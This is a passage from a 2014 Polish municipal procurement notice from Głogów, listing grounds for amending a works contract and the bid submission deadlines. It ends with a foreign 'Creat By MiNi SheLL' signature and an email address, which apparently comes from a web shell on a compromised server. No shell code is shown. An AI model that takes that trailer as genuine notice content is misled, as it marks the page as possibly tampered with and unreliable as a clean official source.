6) Zmiana terminu wykonania tj. rozpoczęcia i zakończenia Przedmiotu Umowy o czas     opóźnienia, w przypadku wystąpienia przedłużającej się procedury badania i oceny ofert oraz procedury odwoławczej,
7)  Zmiana terminu wykonania tj. rozpoczęcia i zakończenia Przedmiotu Umowy, gdy zaistnieje inna, niemożliwa do przewidzenia  w momencie zawarcia umowy okoliczność prawna, ekonomiczna, finansowa  lub techniczna,  skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia,
8)  Zmiana terminu wykonania, wartości Przedmiotu Umowy, w przypadku konieczności wykonania ewentualnych robót zamiennych, zamówień dodatkowych, uzupełniających,
9) Jeżeli wystąpią zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:  wstrzymanie robót przez  Zamawiającego,
10) Jeżeli powstaną okoliczności będące następstwem działania  organów administracji,                    
      w szczególności przekroczenie zakreślonych przez prawo terminów wydawania przez 
      organy administracji decyzji,  zezwoleń  itp.,
11) Jeżeli powstanie konieczność zrealizowania Przedmiotu Umowy przy zastosowaniu innych  rozwiązań technicznych/technologicznych  niż wskazane w SIWZ  w szczególności:
a)  w sytuacji, gdyby zastosowanie przewidzianych  rozwiązań  groziłoby niewykonaniem lub wadliwym wykonaniem Przedmiotu Umowy,
b) konieczności zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego  prawa.
12) Zaistnieje zmiana stawki podatku VAT, która będzie powodować zmianę kosztów  wykonania  po stronie   Wykonawcy, 
13) Zaistnieje kolizja z planowanymi lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim przypadku zmiany w Umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji, a wynagrodzenie zostanie ustalone                               z zachowaniem  zasady opisanej w SIWZ i ofercie Wykonawcy,
14)Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę podwykonawcy lub dalszego podwykonawcy  lub rezygnację z udziału podwykonawcy lub dalszego podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy lub dalszego podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania.
15).Zmiana Umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
      1)  opis zmiany,
      2)  uzasadnienie zmiany,
      3)  koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
      4)  czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
16)Warunkiem wprowadzenia zmian do Umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.glogow.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głogowie, Rynek 10, 67-200 Głogów, pok. nr 314, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2014 godzina 10:00, miejsce: Urząd Miejski w Głogowie, Rynek 10, 67-200 Głogów, pok. nr 125, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com